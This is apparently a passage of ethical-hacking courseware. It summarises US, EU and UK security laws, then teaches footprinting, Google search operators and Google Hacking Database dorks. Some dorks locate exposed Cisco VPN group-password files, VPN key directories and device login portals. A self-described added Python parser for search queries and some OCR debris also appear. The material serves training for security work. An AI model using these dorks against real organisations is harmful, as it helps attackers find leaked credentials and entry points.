  Transactions are electronic exchanges involving the transfer of information between two parties for specific purposes. The Health Insurance Portability and Accountability Act of 1996 (HIPAA) designated certain types of organizations as covered entities, including health plans, health care clearinghouses, and certain health care providers. In the HIPAA regulations, the Secretary of Health and Human Services (HHS) adopted certain standard transactions for the Electronic Data Interchange (EDI) of health care data. These transactions are claims and encounter information, payment and remittance advice, claim status, eligibility, enrollment and disenrollment, referrals and authorizations, coordination of benefits, and premium payment. Under HIPAA, if a covered entity electronically conducts one of the adopted transactions, they must use the adopted standard, either from ASC X12N or NCPDP (for certain pharmacy transactions). Covered entities must adhere to the content and format requirements of each transaction. Every provider who does business electronically must use the same health care transactions, code sets, and identifiers.
- Privacy Rule

  The HIPAA Privacy Rule establishes national standards to protect people's medical records and other personal health information and applies to health plans, health care clearinghouses, and health care providers that conduct certain health care transactions electronically. The rule requires appropriate safeguards to protect the privacy of personal health information. It sets limits and conditions on the uses and disclosures that may be made of such information without patient authorization. The rule also gives patients rights over their health information, including the right to examine and obtain a copy of their health records and to request corrections.

- Security Rule

  The HIPAA Security Rule establishes national standards to protect individuals' electronic personal health information that is created, received, used, or maintained by a covered entity. The Security Rule requires appropriate administrative, physical, and technical safeguards to ensure the confidentiality, integrity, and security of electronically protected health information.

- Employer Identifier Standard

  The HIPAA requires that each employer has a standard national number that identifies them on standard transactions.

- National Provider Identifier (NPI) Standard

  The National Provider Identifier (NPI) is a HIPAA Administrative Simplification Standard. The NPI is a unique identification number assigned to covered health care providers. Covered health care providers and all health plans and health care clearinghouses must use the NPIs in the administrative and financial transactions adopted under HIPAA. The NPI is a 10-position, intelligence-free numeric identifier (10-digit number). This means that the numbers do not carry other information about health care providers, such as the state in which they live or their medical specialty.

- Enforcement Rule

  The HIPAA Enforcement Rule contains provisions relating to compliance and investigation, as well as the imposition of civil monetary penalties for violations of the HIPAA Administrative Simplification Rules and procedures for hearings.

Sarbanes Oxley Act (SOX)

Source: https://www.sec.gov

Enacted in 2002, the Sarbanes-Oxley Act aims to protect the public and investors by increasing the accuracy and reliability of corporate disclosures. This act does not explain how an organization must store records but describes the records that organizations must store and the duration of their storage. The Act mandated several reforms to enhance corporate responsibility, enhance financial disclosures, and combat corporate and accounting fraud.

The key requirements and provisions of SOX are organized into 11 titles:

- Title I: Public Company Accounting Oversight Board (PCAOB): Title I consists of nine sections and establishes the Public Company Accounting Oversight Board to provide independent oversight of public accounting firms that provide audit services ("auditors"). It also creates a central oversight board tasked with registering audit services, defining the specific processes and procedures for compliance audits, inspecting and policing conduct and quality control, and enforcing compliance with the specific mandates of SOX.
- Title II: Auditor Independence: Title II consists of nine sections and establishes standards for external auditor independence to limit conflicts of interest. It also addresses new auditor approval requirements, audit partner rotation, and auditor reporting requirements. It restricts auditing companies from providing non-audit services (such as consulting) for the same clients.
- Title III: Corporate Responsibility: Title III consists of eight sections and mandates that senior executives take individual responsibility for the accuracy and completeness of corporate financial reports. It defines the interaction between external auditors and corporate audit committees and specifies the corporate officers' responsibility for the accuracy and validity of corporate financial reports. It enumerates specific limits on the behaviors of corporate officers and describes specific forfeitures of benefits and civil penalties for non-compliance.
- Title IV: Enhanced Financial Disclosures: Title IV consists of nine sections. It describes enhanced reporting requirements for financial transactions, including off-balance-sheet transactions, pro-forma figures, and the stock transactions of corporate officers. It requires internal controls to ensure the accuracy of financial reports and disclosures and mandates both audits and reports on those controls. It also requires timely reporting of material changes in financial conditions and specific enhanced reviews of corporate reports by the SEC or its agents.
- Title V: Analyst Conflicts of Interest: Title V consists of only one section that discusses the measures designed to help restore investor confidence in the reporting of securities analysts. It defines the code of conduct for securities analysts and requires that they disclose any knowable conflicts of interest.
- Title VI: Commission Resources and Authority: Title VI consists of four sections and defines practices to restore investor confidence in securities analysts. It also defines the SEC's authority to censure or bar securities professionals from practice and defines the conditions to bar a person from practicing as a broker, advisor, or dealer.
- Title VII: Studies and Reports: Title VII consists of five sections and requires the Comptroller General and the Securities and Exchange Commission (SEC) to perform various studies and to report their findings. The required studies and reports include the effects of the consolidation of public accounting firms, the role of credit rating agencies in the operation of securities markets, securities violations, enforcement actions, and whether investment banks assisted Enron, Global Crossing, and others to manipulate earnings and obfuscate true financial conditions.
- Title VIII: Corporate and Criminal Fraud Accountability: Title VIII, also known as the "Corporate and Criminal Fraud Accountability Act of 2002," consists of seven sections. It describes specific criminal penalties for the manipulation, destruction, or alteration of financial records or interference with investigations, while also providing certain protections for whistle-blowers.
- Title IX: White-Collar-Crime Penalty Enhancement: Title IX, also known as the "White Collar Crime Penalty Enhancement Act of 2002," consists of six sections. This title increases the criminal penalties associated with white-collar crimes and conspiracies. It recommends stronger sentencing guidelines and specifically adds failure to certify corporate financial reports as a criminal offense.
- Title X: Corporate Tax Returns: Title X consists of one section that states that the Chief Executive Officer should sign the company tax return.
- Title XI: Corporate Fraud Accountability: Title XI consists of seven sections. Section 1101 recommends the following name for the title: "Corporate Fraud Accountability Act of 2002." It identifies corporate fraud and records tampering as criminal offenses and joins those offenses to specific penalties. It also revises sentencing guidelines and strengthens penalties. Doing so enables the SEC to temporarily freeze "large" or "unusual" transactions or payments.

The Digital Millennium Copyright Act (DMCA)

Source: https://www.copyright.gov

The DMCA is an American copyright law that implements two 1996 treaties from the World Intellectual Property Organization (WIPO): the WIPO Copyright Treaty and the WIPO Performances and Phonograms Treaty. In order to implement US treaty obligations, the DMCA defines legal prohibitions against circumvention of the technological protection measures employed by copyright owners to protect their works, and against the removal or alteration of copyright management information. The DMCA contains five titles:

- Title I: WIPO TREATY IMPLEMENTATION: Title I implements the WIPO treaties. First, it makes certain technical amendments to US law in order to provide the appropriate references and links to the treaties. Second, it creates two new prohibitions in Title 17 of the U.S. Code—one on circumvention of the technological measures used by copyright owners to protect their works and one on tampering with copyright management information—and adds civil remedies and criminal penalties for violating the prohibitions.
- Title II: ONLINE COPYRIGHT INFRINGEMENT LIABILITY LIMITATION: Title II of the DMCA adds a new section 512 to the Copyright Act to create four new limitations on liability for copyright infringement by online service providers. A service provider bases these limitations on the following four categories of conduct:
  - Transitory communications
  - System caching
  - The user-directed storage of information on systems or networks
  - Information location tools

  New section 512 also includes special rules concerning the application of these limitations to nonprofit educational institutions.
- Title III: COMPUTER MAINTENANCE OR REPAIR: Title III of the DMCA allows the owner of a copy of a program to make reproductions or adaptations when necessary to use the program in conjunction with a computer. The amendment permits the owner or lessee of a computer to make or to authorize the making of a copy of a computer program in the course of maintaining or repairing that computer.

- Title IV: MISCELLANEOUS PROVISIONS: Title IV contains six miscellaneous provisions. The first provision announces the Clarification of the Authority of the Copyright Office; the second grants exemption for the making of “ephemeral recordings”; the third promotes study by distance education; the fourth provides an exemption for Nonprofit Libraries and Archives; the fifth allows Webcasting Amendments to the Digital Performance Right in Sound Recordings; and, finally, the sixth provision addresses concerns about the ability of writers, directors, and screen actors to obtain residual payments for the exploitation of motion pictures in situations where the producer is no longer able to make these payments.
- Title V: PROTECTION OF CERTAIN ORIGINAL DESIGNS: Title V of the DMCA is entitled the Vessel Hull Design Protection Act (VHDPA). This act creates a new system for protecting the original designs of certain useful articles that make the article attractive or distinctive in appearance. For purposes of the VHDPA, “useful articles” are limited to the hulls (including decks) of vessels no longer than 200 feet.

The Federal Information Security Management Act (FISMA)
Source: https://csrc.nist.gov
The Federal Information Security Management Act of 2002 was enacted to produce several key security standards and guidelines required by Congressional legislation. The FISMA provides a comprehensive framework for ensuring the effectiveness of information security controls over information resources that support federal operations and assets. It requires each federal agency to develop, document, and implement an agency-wide program to provide information security for the information and information systems that support the operations and assets of the agency, including those provided or managed by another agency, contractor, or another source. The FISMA framework includes:
- Standards for categorizing information and information systems by mission impact
- Standards for the minimum security requirements for information and information systems
- Guidance for selecting appropriate security controls for information systems
- Guidance for assessing security controls in information systems and determining their effectiveness
- Guidance for the security authorization of information systems

General Data Protection Regulation (GDPR)
Source: https://gdpr.eu
The General Data Protection Regulation (GDPR) is one of the most stringent privacy and security laws globally. Though it was drafted and passed by the European Union (EU), it imposes obligations onto organizations anywhere, so long as they target or collect data related to people in the EU. The regulation was put into effect on May 25, 2018. The GDPR will levy harsh fines against those who violate its privacy and security standards, with penalties reaching tens of millions of euros.

With the GDPR, Europe signifies its firm stance on data privacy and security at a time when more people are entrusting their data to cloud services and breaches are a daily occurrence. The regulation itself is extensive, far-reaching, and relatively light on specifics, making GDPR compliance a daunting prospect, particularly for small and medium-sized enterprises (SMEs).
GDPR Data Protection Principles
The GDPR includes seven protection and accountability principles outlined in Article 5.1-2:
- Lawfulness, fairness, and transparency: Processing must be lawful, fair, and transparent to the data subject.
- Purpose limitation: You must process data for the legitimate purposes specified explicitly to the data subject when you collected it.
- Data minimization: You should collect and process only as much data as necessary for the purposes specified.
- Accuracy: You must keep personal data accurate and up to date.
- Storage limitation: You may only store personally identifying data for as long as necessary for the specified purpose.
- Integrity and confidentiality: Processing must be done in such a way as to ensure appropriate security, integrity, and confidentiality (e.g., by using encryption).
- Accountability: The data controller is responsible for demonstrating GDPR compliance with all of these principles.

Data Protection Act 2018 (DPA)
Source: https://www.legislation.gov.uk
The DPA 2018 sets out the framework for data protection law in the UK. It updates and replaces the Data Protection Act 1998 and came into effect on 25 May, 2018. It was amended on 01 January, 2021 by regulations under the European Union (Withdrawal) Act 2018 to reflect the UK's status outside the EU.

The DPA is an act to make provision for the regulation of the processing of information relating to individuals; to make provision in connection with the Information Commissioner's functions under specific regulations relating to information; to make provision for a direct marketing code of practice; and for connected purposes. The DPA also sets out separate data protection rules for law enforcement authorities, extends data protection to some other areas such as national security and defense, and sets out the Information Commissioner's functions and powers.
Protection of personal data
1. The DPA protects individuals concerning the processing of personal data, in particular by:
   a. Requiring personal data to be processed lawfully and fairly, based on the data subject's consent or another specified basis,
   b. Conferring rights on the data subject to obtain information about the processing of personal data and to require inaccurate personal data to be rectified, and
   c. Conferring functions on the Commissioner, giving the holder of that office responsibility to monitor and enforce their provisions.
2. When carrying out functions under the GDPR, the applied GDPR, and this Act, the Commissioner must regard the importance of securing an appropriate level of protection for personal data, taking account of the interests of data subjects, controllers, and others, and matters of general public interest.

Cyber Law in Different Countries
[Slide table, garbled in extraction: cyber laws listed by country, with entries for Japan, Singapore, South Africa, South Korea, Belgium, and Hong Kong, including trademark and copyright legislation.]
Cyber Law in Different Countries
Cyberlaw or Internet law refers to any laws that deal with protecting the Internet and other online communication technologies. Cyberlaw covers topics such as Internet access and usage, privacy, freedom of expression, and jurisdiction. Cyber laws provide an assurance of the integrity, security, privacy, and confidentiality of information in both governmental and private organizations. These laws have become prominent due to the increase in Internet usage around the world. Cyber laws vary by jurisdiction and country, so implementing them is quite challenging. Violating these laws results in punishments ranging from fines to imprisonment.

Module Summary
This module has discussed elements of information security, information security attacks, and information warfare. It has covered cyber kill chain methodology, TTPs, and IoCs in detail. It also discussed hacking concepts, types, and phases. This module closely examined ethical hacking concepts such as its scope and limitations and the skills of an ethical hacker. It also covered the topic of information security controls such as defense-in-depth, risk management, cyber threat intelligence, threat modeling, incident management process, and AI and ML. Finally, this module ended with a detailed discussion of various information security acts and laws.

The next module will examine how attackers, as well as ethical hackers and pen testers, perform footprinting to collect information about their target before an attack or audit.

Certified Ethical Hacker
Module 02: Footprinting and Reconnaissance
Module Objectives
Footprinting is the first step in the evaluation of the security posture of the IT infrastructure of a target organization. Through footprinting and reconnaissance, one can gather maximum information about a computer system or a network and about any device connected to that network. In other words, footprinting provides a security profile blueprint for an organization and should be undertaken in a methodological manner.

This module starts with an introduction to footprinting concepts and provides insights into the footprinting methodology. The module ends with an overview of footprinting tools and countermeasures.

At the end of this module, you will be able to:
- Describe footprinting concepts
- Perform footprinting through search engines and using advanced Google hacking techniques
- Perform footprinting through web services and social networking sites
- Perform website footprinting and email footprinting
- Perform Whois, DNS, and network footprinting
- Perform footprinting through social engineering
- Use different footprinting tools
- Apply footprinting best practices

Module Flow
Ethical hacking is legal in nature and is conducted to evaluate the security of an organization's IT infrastructure with their consent. Footprinting, where an attacker tries to gather information about a target, is the first step in ethical hacking. This step acts as a preparatory phase for the attacker, who needs to gather as much information as possible to find ways to intrude into the target network easily.

This section aims to familiarize you with footprinting, why it is necessary, and its objectives.

What is Footprinting?
An essential aspect of footprinting is identifying the level of risk associated with the organization's publicly accessible information. Footprinting, the first step in ethical hacking, refers to the process of collecting information about a target network and its environment. Using footprinting, you can find a number of opportunities to penetrate and assess the target organization's network.

After you complete the footprinting process in a methodological manner, you will obtain the blueprint of the security profile of the target organization. Here, the term “blueprint” refers to the unique system profile of the target organization acquired by footprinting.

There is no single methodology for footprinting, as information can be traced in a number of ways. However, the activity is important, as you need to gather all the crucial information about the target organization before beginning the hacking phase. For this reason, footprinting needs to be carried out in an organized manner. The information gathered in this step helps in uncovering vulnerabilities existing in the target network and in identifying different ways of exploiting these vulnerabilities.

Types of Footprinting
Footprinting can be categorized into passive footprinting and active footprinting.
- Passive Footprinting
  Passive footprinting involves gathering information about the target without direct interaction. It is mainly useful when the information gathering activities are not to be detected by the target. Performing passive footprinting is technically difficult, as active traffic is not sent to the target organization from a host or anonymous hosts or services
  over the Internet. We can only collect archived and stored information about the target using search engines, social networking sites, and so on.
  Passive footprinting techniques include:
  - Finding information through search engines
  - Finding the Top-level Domains (TLDs) and sub-domains of a target through web services
  - Collecting location information on the target through web services
  - Performing people search using social networking sites and people search services
  - Gathering financial information about the target through financial services
  - Gathering infrastructure details of the target organization through job sites
  - Collecting information through deep and dark web footprinting
  - Determining the operating systems in use by the target organization
  - Performing competitive intelligence
  - Monitoring the target using alert services
  - Gathering information using groups, forums, blogs, and NNTP Usenet newsgroups
  - Collecting information through social engineering on social networking sites
  - Extracting information about the target using Internet archives
  - Gathering information using business profile sites
  - Monitoring website traffic of the target
  - Tracking the online reputation of the target
- Active Footprinting
  Active footprinting involves gathering information about the target with direct interaction. In active footprinting, the target may recognize the ongoing information gathering process, as we overtly interact with the target network. Active footprinting requires more preparation than passive footprinting, as it may leave traces that may alert the target organization.
  Active footprinting techniques include:
  - Querying published name servers of the target
  - Searching for digital files
  - Extracting website links and gathering wordlists from the target website
  - Extracting metadata of published documents and files
  - Gathering website information using web spidering and mirroring tools
  - Gathering information through email tracking
  - Harvesting email lists
  - Performing Whois lookup
  - Extracting DNS information
  - Performing traceroute analysis
  - Performing social engineering
Information Obtained in Footprinting
The major objectives of footprinting include collecting the network information, system information, and organizational information of the target. By conducting footprinting across different network levels, you can gain information such as network blocks, specific IP addresses, employee details, and so on. Such information can help attackers in gaining access to sensitive data or performing various attacks on the target network.
- Organization Information: Such information about an organization is available from its website. In addition, you can query the target's domain name against the Whois database and obtain valuable information. The information collected includes:
  - Employee details (employee names, contact addresses, designations, and work experience)
  - Addresses and mobile/telephone numbers
  - Branch and location details
  - Partners of the organization
  - Web links to other company-related sites
  - Background of the organization
  - Web technologies
  - News articles, press releases, and related documents
  - Legal documents related to the organization
  - Patents and trademarks related to the organization
  Attackers can access organizational information and use such information to identify key personnel and launch social engineering attacks to extract sensitive data about the entity.
- Network Information: You can gather network information by performing Whois database analysis, trace routing, and so on. The information collected includes:
  - Domain and sub-domains
  - Network blocks
  - Network topology, trusted routers, and firewalls
  - IP addresses of the reachable systems
  - Whois records
  - DNS records and related information
- System Information: You can gather system information by performing network footprinting, DNS footprinting, website footprinting, email footprinting, and so on. The information collected includes:
  - Web server OS
  - Location of web servers
  - Publicly available email addresses
  - Usernames, passwords, and so on
Objectives of Footprinting
To build a hacking strategy, attackers need to gather information about the target organization's network. They then use such information to locate the easiest way to break through the organization's security perimeter. As mentioned previously, the footprinting methodology makes it easy to gather information about the target organization; this plays a vital role in the hacking process.

Footprinting helps to:
- Know Security Posture: Performing footprinting on the target organization gives the complete profile of the organization's security posture. Hackers can then analyze the report to identify loopholes in the security posture of the target organization and build a hacking plan accordingly.
- Reduce Focus Area: By using a combination of tools and techniques, attackers can take an unknown entity (for example, XYZ Organization) and reduce it to a specific range of domain names, network blocks, and individual IP addresses of systems directly connected to the Internet, as well as many other details pertaining to its security posture.
- Identify Vulnerabilities: A detailed footprint provides maximum information about the target organization. It allows the attacker to identify vulnerabilities in the target systems to select appropriate exploits. Attackers can build their own information database about the security weaknesses of the target organization. Such a database can then help in identifying the weakest link in the organization's security perimeter.
- Draw Network Map: Combining footprinting techniques with tools such as Tracert allows the attacker to create diagrammatic representations of the target organization's network presence. Specifically, it allows attackers to draw a map or outline of the target organization's network infrastructure to know about the actual environment that they are going to break into. A network map will depict the attacker's understanding of the target's Internet footprint. These network diagrams can guide the attacker in performing an attack.

Footprinting Threats
Attackers perform footprinting as the first step of any attack on information systems. In this phase, attackers attempt to collect valuable system-level information such as account details, operating system and other software versions, server names, database schema details, and so on, which will be useful in the hacking process.

The following are assorted threats made possible through footprinting:
- Social Engineering: Without using any intrusion methods, hackers directly and indirectly collect information through persuasion and other means. Hackers gather crucial information from willing employees who are unaware of the hackers' intent.
- System and Network Attacks: Footprinting enables an attacker to perform system and network attacks. Thus, attackers can gather information related to the target organization's system configuration, the operating system running on the machine, and so on. Using this information, attackers can find vulnerabilities in the target system and then exploit such vulnerabilities. They can then take control of a target system or the entire network.
- Information Leakage: Information leakage poses a threat to any organization. If sensitive information of an entity falls into the hands of attackers, they can mount an attack based on the information or alternatively use it for monetary benefit.
- Privacy Loss: Through footprinting, hackers can access the systems and networks of the organization and even escalate the privileges up to admin levels, resulting in the loss of privacy for the organization as a whole and for its individual personnel.
- Corporate Espionage: Corporate espionage is a central threat to organizations, as competitors often aim to attempt to secure sensitive data through footprinting. Through this approach, competitors can launch similar products in the market, alter prices, and generally undermine the market position of a target organization.
- Business Loss: Footprinting can have a major effect on organizations such as online businesses and other e-commerce websites as well as banking and finance-related businesses. Billions of dollars are lost every year due to malicious attacks by hackers.

Module Flow
Footprinting Methodology
Now that you are familiar with footprinting concepts and potential threats, we will discuss the footprinting methodology. The footprinting methodology is a procedure for collecting information about a target organization from all available sources. It involves gathering information about a target organization, such as URLs, locations, establishment details, number of employees, specific range of domain names, contact information, and other related information. Attackers collect this information from publicly accessible sources such as search engines, social networking sites, Whois databases, and so on. This section discusses the common techniques used to collect information about the target organization from different sources.

Footprinting techniques:
- Footprinting through search engines
- Footprinting through web services
- Footprinting through social networking sites
- Website footprinting
- Email footprinting
- Whois footprinting
- DNS footprinting
- Network footprinting
- Footprinting through social engineering

Footprinting through Search Engines
Search engines are the main sources of key information about a target organization. They play a major role in extracting critical details about a target from the Internet. Search engines use automated software, i.e., crawlers, to continuously scan active websites and add the retrieved results to the search engine index, which is in turn stored in a massive database. When a user queries the search engine index, it returns a list of Search Engine Results Pages (SERPs). These results include web pages, videos, images, and many different file types ranked and displayed according to their relevance. Many search engines can extract target organization information such as technology platforms, employee details, login pages, intranet portals, contact information, and so on. The information helps the attacker in performing social engineering and other types of advanced system attacks.

A Google search could reveal submissions to forums by security personnel, disclosing the brands of firewalls or antivirus software used by the target. This information helps the attacker in identifying vulnerabilities in such security controls.

For example, consider an organization, perhaps Microsoft. Type Microsoft in the Search box of a search engine and press Enter; this will display the results containing information about Microsoft. Browsing the results often provides critical information such as physical location, contact addresses, services offered, number of employees, and so on, which may prove to be a valuable source for hacking.

Examples of major search engines include Google, Bing, Yahoo, Ask, Aol, Baidu, WolframAlpha, and DuckDuckGo.

Attackers can use advanced search operators available with these search engines and create complex queries to find, filter, and sort specific information regarding the target. Search engines

ical andCountermensores
Mackin ©by E-Comel
Copyright
are also used to find other sources of publicly accessible information. For example, you can type “top job portals” to find major job portals that provide critical information about the target organization.

As an ethical hacker, if you find any deleted pages/information about your company in SERPs or the search engine cache, you can request the search engine to remove the pages/information from its indexed cache.

Footprinting Using Advanced Google Hacking Techniques
Google hacking refers to the use of advanced Google search operators for creating complex search queries to extract sensitive or hidden information. The accessed information is then used by attackers to find vulnerable targets. Footprinting using advanced Google hacking techniques involves locating specific strings of text within search results using advanced operators in the Google search engine.

Advanced Google hacking refers to the art of creating complex search engine queries. Queries can retrieve valuable data about a target company from Google search results. Through Google hacking, an attacker tries to find websites that are vulnerable to exploitation. Attackers can use the Google Hacking Database (GHDB), a database of queries, to identify sensitive data. Google operators help in finding the required text and avoiding irrelevant data. Using advanced Google operators, attackers can locate specific strings of text such as specific versions of vulnerable web applications.

When a query without advanced search operators is specified, Google traces the search terms in any part of the web page, including the title, text, URL, digital files, and so on. To confine a search, Google offers advanced search operators. These search operators help to narrow down the search query and obtain the most relevant and accurate output.

The syntax to use an advanced search operator is as follows: operator:search_term
Note: Do not enter any spaces between the operator and the query.

Some popular Google advanced search operators include:
Source: http://www.googleguide.com
- site: This operator restricts search results to the specified site or domain.
  For example, the [games site:www.certifiedhacker.com] query gives information on games from the certifiedhacker site.
- allinurl: This operator restricts results to only the pages containing all the query terms specified in the URL.
  For example, the [allinurl:google career] query returns only pages containing the words “google” and “career” in the URL.
- inurl: This operator restricts the results to only the pages containing the specified word in the URL.
  For example, the [inurl:copy site:www.google.com] query returns only Google pages in which the URL has the word “copy.”
- allintitle: This operator restricts results to only the pages containing all the query terms specified in the title.
  For example, the [allintitle:detect malware] query returns only pages containing the words “detect” and “malware” in the title.
- intitle: This operator restricts results to only the pages containing the specified term in the title.
  For example, the [malware detection intitle:help] query returns only pages that have the term “help” in the title, and the terms “malware” and “detection” anywhere within the page.
- inanchor: This operator restricts results to only the pages containing the query terms specified in the anchor text on links to the page.
  For example, the [Anti-virus inanchor:Norton] query returns only pages with the word “Norton” in the anchor text on links to the pages and the page containing the word “Anti-virus.”
- allinanchor: This operator restricts results to only the pages containing all query terms specified in the anchor text on links to the pages.
  For example, the [allinanchor:best cloud service provider] query returns only pages for which the anchor text on links to the pages contains the words “best,” “cloud,” “service,” and “provider.”
- cache: This operator displays Google's cached version of a web page instead of the current version of the web page.
  For example, [cache:www.eff.org] will show Google's cached version of the Electronic Frontier Foundation home page.
- link: This operator searches websites or pages that contain links to the specified website or page.
  For example, [link:www.googleguide.com] finds pages that point to Google Guide's home page.
  Note: According to Google's documentation, “you cannot combine a link: search with a regular keyword search.”
  Also note that when you combine link: with another advanced Google operator, Google may not return all the pages that match.
- related: This operator displays websites that are similar or related to the URL specified.
  For example, [related:www.microsoft.com] provides the Google search engine results page with websites similar to microsoft.com.
- info: This operator finds information for the specified web page.
  For example, [info:gothotel.com] provides information about the national hotel directory GotHotel.com home page.
- location: This operator finds information for a specific location.
  For example, [location: 4 seasons restaurant] will give you results based on the term “4 seasons restaurant.”
- filetype: This operator allows you to search for results based on a file extension.
  For example, [jasmine filetype:jpg] will provide jpg files based on jasmine.
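To make the operator:search_term syntax rules above concrete, here is an added Python example (not code from the courseware or from Google) that parses and builds such queries, flags the two constraints the text states (no space after the colon; link: not combined with keywords), and adds a check that a self-assessment query is scoped to your own domain with site:. The operator set mirrors this section's list, and every domain name in it is a constructed sample.

```python
"""Google advanced-search query syntax (operator:search_term) as described above.

Added example, not code from the CEH courseware or from Google. It encodes the rules
stated in the text: an operator is immediately followed by its term with no space,
and a link: search cannot be combined with a regular keyword search. Domain names
used below are constructed samples.
"""
import re
from dataclasses import dataclass, field
from typing import List, Tuple

# Operators named in this section (intext: appears in the module's worked example).
KNOWN_OPERATORS = {
    "site", "allinurl", "inurl", "allintitle", "intitle", "inanchor",
    "allinanchor", "cache", "link", "related", "info", "location",
    "filetype", "intext",
}

# A token is a run of non-whitespace, optionally ending in a quoted phrase so that
# intext:"human resources" stays together as one token.
_TOKEN_RE = re.compile(r'\S*"[^"]*"|\S+')
_OPERATOR_RE = re.compile(r"^([A-Za-z]+):(.*)$", re.DOTALL)


@dataclass
class ParsedQuery:
    operators: List[Tuple[str, str]] = field(default_factory=list)
    keywords: List[str] = field(default_factory=list)
    warnings: List[str] = field(default_factory=list)


def parse_query(query: str) -> ParsedQuery:
    """Split a query into (operator, term) pairs and plain keywords, noting syntax problems."""
    result = ParsedQuery()
    for token in _TOKEN_RE.findall(query):
        body = token.lstrip("+-")  # include/exclude prefixes are not part of the operator
        match = _OPERATOR_RE.match(body)
        if match and match.group(1).lower() in KNOWN_OPERATORS:
            op, term = match.group(1).lower(), match.group(2).strip('"')
            if not term:
                # "site: example.com": the space detaches the term, so the search engine
                # would treat the next token as an ordinary keyword.
                result.warnings.append(f"{op}: has no term; remove the space after the colon")
                continue
            result.operators.append((op, term))
        else:
            # Unknown prefixes such as http: are ordinary keywords.
            result.keywords.append(body.strip('"'))
    ops = [op for op, _ in result.operators]
    if "link" in ops and result.keywords:
        result.warnings.append("link: cannot be combined with a regular keyword search")
    if "link" in ops and len(ops) > 1:
        result.warnings.append("link: combined with other operators may not return all matches")
    return result


def build_query(keywords: List[str], operators: List[Tuple[str, str]]) -> str:
    """Assemble operator:term parts (quoting phrases) followed by keywords, rejecting bad syntax."""
    parts = []
    for op, term in operators:
        op = op.lower()
        if op not in KNOWN_OPERATORS:
            raise ValueError(f"unknown operator: {op}")
        term = term.strip()  # never emit a space between the colon and the term
        if not term:
            raise ValueError(f"{op}: requires a search term")
        if op == "link" and keywords:
            raise ValueError("link: cannot be combined with a regular keyword search")
        parts.append(f'{op}:"{term}"' if " " in term else f"{op}:{term}")
    parts.extend(f'"{kw}"' if " " in kw else kw for kw in keywords)
    return " ".join(parts)


def restricted_to_domain(query: str, domain: str) -> bool:
    """True if the query has at least one site: term and every site: term is the given
    domain or one of its subdomains (a guard for self-assessment of your own exposure)."""
    sites = [term.lower() for op, term in parse_query(query).operators if op == "site"]
    domain = domain.lower()
    return bool(sites) and all(s == domain or s.endswith("." + domain) for s in sites)


if __name__ == "__main__":
    for sample in ('intitle:intranet inurl:intranet +intext:"human resources"',
                   "site: www.certifiedhacker.com",
                   "link:www.googleguide.com security"):
        print(sample, "->", parse_query(sample))
    print(build_query(["games"], [("site", "www.certifiedhacker.com")]))
    print(restricted_to_domain("filetype:pdf site:docs.example.com", "example.com"))
```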
What can a Hacker do with Google Hacking?
An attacker can create complex search engine queries to filter large amounts of search results to obtain information related to computer security. The attacker uses Google operators that help locate specific strings of text within the search results. Thus, the attacker can not only detect websites and web servers that are vulnerable to exploitation but also locate private, sensitive information about others, such as credit card numbers, social security numbers, passwords, and so on. Once a vulnerable site is identified, attackers try to launch various possible attacks, such as buffer overflow and SQL injection, which compromise information security.

Examples of sensitive information on public servers that an attacker can extract with the help of Google Hacking Database (GHDB) queries include:
- Error messages that contain sensitive information
- Files containing passwords
- Sensitive directories
- Pages containing logon portals
- Pages containing network or vulnerability data, such as IDS, firewall logs, and configurations
- Advisories and server vulnerabilities
- Software version information
- Web application source code
- Connected IoT devices and their control panels, if unprotected
- Hidden web pages such as intranet and VPN services
Example: Use the Google Advance Operator syntax (intitle:intranet inurl:intranet +intext:"human resources") to find sensitive information about a target organization and its employees. Attackers use the gathered information to perform social engineering attacks. The screenshot below shows a Google search engine results page displaying the results for the query mentioned above.

Figure 2.1: Search engine results for given Google Advance Operator syntax
Google Hacking Database

Source: https://www.exploit-db.com

The Google Hacking Database (GHDB) is an authoritative source for querying the ever-widening scope of the Google search engine. In the GHDB, you will find search terms for files containing usernames, vulnerable servers, and even files containing passwords. The Exploit Database is a Common Vulnerabilities and Exposures (CVE) compliant archive of public exploits and corresponding vulnerable software, developed for use by penetration testers and vulnerability researchers.

Using GHDB dorks, attackers can rapidly identify all the publicly available exploits and vulnerabilities of the target organization's IT infrastructure. Attackers use Google advanced search operators in Google dorks to extract sensitive information about the target, such as vulnerable servers, error messages, sensitive files, login pages, and websites.

Google Hacking Database Categories:

+ Footholds
+ Files Containing Usernames
+ Sensitive Directories
+ Web Server Detection
+ Vulnerable Files
+ Vulnerable Servers
+ Error Messages
+ Files Containing Juicy Info
+ Files Containing Passwords
+ Sensitive Online Shopping Info
+ Network or Vulnerability Data
+ Pages Containing Login Portals
+ Various Online Devices
+ Advisories and Vulnerabilities

VoIP and VPN Footprinting through Google Hacking Database

Google hacking involves the implementation of advanced operators in the Google search engine to match specific strings of text within the search result. These advanced operators help refine searches to expose sensitive information, vulnerabilities, and passwords. You can use these Google hacking operators or Google dorks for VoIP and VPN footprinting. Thus, you can extract information such as pages containing login portals, VoIP login portals, directories with keys of VPN servers, and so on.

The following tables summarize some of the Google hacking operators or Google dorks to obtain specific information related to VoIP and VPN footprinting, respectively.
Google search queries for VoIP footprinting

Google Dork
    Description

intitle:"Login Page" intext:"Phone Adapter Configuration Utility"
    Pages containing login portals

intitle:"D-Link VoIP Router" "Welcome"
    Pages containing D-Link login portals

inurl:/voice/advanced/ intitle:Linksys SPA configuration
    Finds the Linksys VoIP router configuration page

intitle:asterisk.management.portal web-access
    Looks for the Asterisk management portal

intitle:"SPA504G Configuration"
    Finds Configuration Utility for Cisco SPA504G IP phones

intitle:"Sipura.SPA.Configuration" -.pdf
    Finds configuration pages for online VoIP devices

intitle:asterisk.management.portal web-access
    Finds the Asterisk web management portal

intitle:"login" inurl:8080 intext:"User Login" "English"
    VoIP login portals

Table: Google search queries for VoIP footprinting
Google search queries for VPN footprinting

Google Dork
    Description

"cisco" "GroupPwd" filetype:pcf
    Cisco VPN files with Group Passwords for remote access

"[main]" "enc_GroupPwd=" ext:txt
    Finds Cisco VPN client passwords (encrypted but easily cracked)

"Config" intitle:"Index of" intext:vpn
    Directory with keys of VPN servers

inurl:/remote/login?lang=en
    Finds FortiGate Firewall's SSL-VPN login portal

!Host=*.* intext:enc_UserPassword=* ext:pcf
    Looks for profile configuration files (.pcf), which contain user VPN profiles

filetype:rcf inurl:vpn
    Finds SonicWall Global VPN Client files containing sensitive information and login

filetype:pcf vpn OR Group
    Finds publicly accessible .pcf files used by VPN clients

vpnssl
    Retrieves login portals containing companies' vpnssl access

intitle:"SSL VPN Service" + intext:"Your system administrator provided the following information to help understand and remedy the security conditions:"
    Finds Cisco ASA login web pages

